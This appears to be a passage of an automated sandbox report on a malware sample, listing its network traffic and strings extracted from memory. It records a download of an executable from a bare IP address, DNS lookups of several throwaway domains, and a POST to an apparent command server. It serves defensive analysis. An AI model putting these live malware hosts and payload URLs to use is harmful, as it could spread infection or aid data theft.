          Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
          Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
          Source: global trafficDNS traffic detected: DNS query: frogs-severz.sbs
          Source: global trafficDNS traffic detected: DNS query: occupy-blushi.sbs
          Source: global trafficDNS traffic detected: DNS query: blade-govern.sbs
          Source: global trafficDNS traffic detected: DNS query: story-tense-faz.sbs
          Source: global trafficDNS traffic detected: DNS query: leg-sate-boat.sbs
          Source: global trafficDNS traffic detected: DNS query: disobey-curly.sbs
          Source: global trafficDNS traffic detected: DNS query: motion-treesz.sbs
          Source: global trafficDNS traffic detected: DNS query: powerful-avoids.sbs
          Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
          Source: global trafficDNS traffic detected: DNS query: marshal-zhukov.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
          Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: marshal-zhukov.com
          Source: file.exe, 00000003.00000002.1833693998.000000000019A000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000003.00000002.1834770551.000000000082D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1743684827.000000000083F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
          Source: file.exe, 00000003.00000003.1482858634.000000000552E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: file.exe, 00000003.00000003.1482858634.000000000552E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: file.exe, 00000003.00000003.1482858634.000000000552E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: file.exe, 00000003.00000003.1482858634.000000000552E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: file.exe, 00000003.00000003.1482858634.000000000552E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: file.exe, 00000003.00000003.1482858634.000000000552E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: file.exe, 00000003.00000003.1482858634.000000000552E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: file.exe, 00000003.00000003.1524310129.000000000082B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1834770551.000000000082D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1564208049.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
          Source: file.exe, 00000003.00000003.1482858634.000000000552E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: file.exe, 00000003.00000003.1482858634.000000000552E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
          Source: chromecache_123.9.drString found in binary or memory: http://schema.org/Organization
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524310129.000000000082B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1383723000.000000000083B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1564208049.000000000082B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
          Source: file.exe, 00000003.00000003.1531875260.0000000000853000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524310129.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/sY
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
          Source: file.exe, 00000003.00000003.1482858634.000000000552E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: file.exe, 00000003.00000003.1482858634.000000000552E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: file.exe, 00000003.00000003.1421710686.000000000545A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421648042.000000000545D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421790831.000000000545A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://aka.ms/certhelp
          Source: chromecache_123.9.drString found in binary or memory: https://aka.ms/feedback/report?space=61
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://aka.ms/msignite_docs_banner
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://aka.ms/pshelpmechoose
          Source: chromecache_123.9.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
          Source: chromecache_123.9.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
          Source: chromecache_123.9.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
          Source: file.exe, 00000003.00000003.1524242993.00000000054A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524380885.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524284316.00000000054AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700
          Source: file.exe, 00000003.00000003.1524242993.00000000054A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524380885.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524284316.00000000054AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
          Source: file.exe, 00000003.00000003.1421710686.000000000545A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421648042.000000000545D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421790831.000000000545A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: file.exe, 00000003.00000003.1421710686.000000000545A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421648042.000000000545D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421790831.000000000545A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: file.exe, 00000003.00000003.1421710686.000000000545A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421648042.000000000545D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421790831.000000000545A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://channel9.msdn.com/
          Source: chromecache_115.9.dr, chromecache_103.9.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=4Vb3xc8UazdB&a
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_c
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=OgygW_VD
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=ycjp
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&am
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&amp;l
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=engl
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&a
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&a
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=eng
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=e
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=nT6RHKdfWgaJ&amp;l=e
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
          Source: file.exe, 00000003.00000003.1383684822.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=en
          Source: file.exe, 00000003.00000003.1524242993.00000000054A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524380885.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524284316.00000000054AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
          Source: file.exe, 00000003.00000003.1524242993.00000000054A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524380885.00000000054B6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1524284316.00000000054AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
          Source: file.exe, 00000003.00000003.1421710686.000000000545A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421648042.000000000545D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421790831.000000000545A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: file.exe, 00000003.00000003.1421710686.000000000545A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421648042.000000000545D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1421790831.000000000545A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
